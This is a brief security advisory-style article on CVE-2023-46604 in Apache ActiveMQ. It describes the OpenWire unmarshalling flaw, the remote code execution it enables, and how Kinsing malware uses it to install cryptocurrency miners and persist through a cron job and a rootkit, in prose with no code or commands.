CVE-2023–46604 has emerged as a critical vulnerability in Apache ActiveMQ, an open-source message-oriented middleware (MOM) protocol developed by Apache. This vulnerability has been exploited by cybercriminals to execute remote code execution (RCE) attacks, particularly targeting Linux systems with the Kinsing malware and cryptocurrency miners.
- Vulnerability in OpenWire Protocol: CVE-2023–46604 arises from a flaw in the OpenWire commands, which fail to validate throwable class types during unmarshalling. OpenWire, a binary protocol, is designed for efficiency in message-oriented middleware. Its binary format, serving as the native wire format of ActiveMQ, optimizes bandwidth use and supports a wide array of message types.
- Remote Code Execution (RCE): This vulnerability enables attackers to execute arbitrary code on the server or application, leading to potential security risks. The issue is so severe that it can cause the instantiation and execution of any class.
- Exploitation by Kinsing Malware: The Kinsing malware, a significant threat to Linux-based systems, exploits this vulnerability to infiltrate servers and spread across networks rapidly. It primarily gains entry through vulnerabilities in web applications or misconfigured container environments. Once inside, it deploys cryptocurrency-mining scripts that exploit the host’s resources, impacting system performance and infrastructure.
- Persistence and Rootkit Loading: Kinsing ensures its persistence on the affected host by adding a cronjob that downloads and executes a malicious bootstrap script every minute. Moreover, it doubles down on its persistence and compromise by loading its rootkit in the
/etc/ld.so.preload
directory, completing a full system compromise. - Widespread Exploitation and Threat Actors: Since November, several reports have surfaced of threat actors actively exploiting CVE-2023–46604. This includes high-profile vulnerabilities and proof-of-concept exploits like Metasploit and Nuclei. The widespread exploitation by various threat actors makes this a significant security risk for organizations worldwide.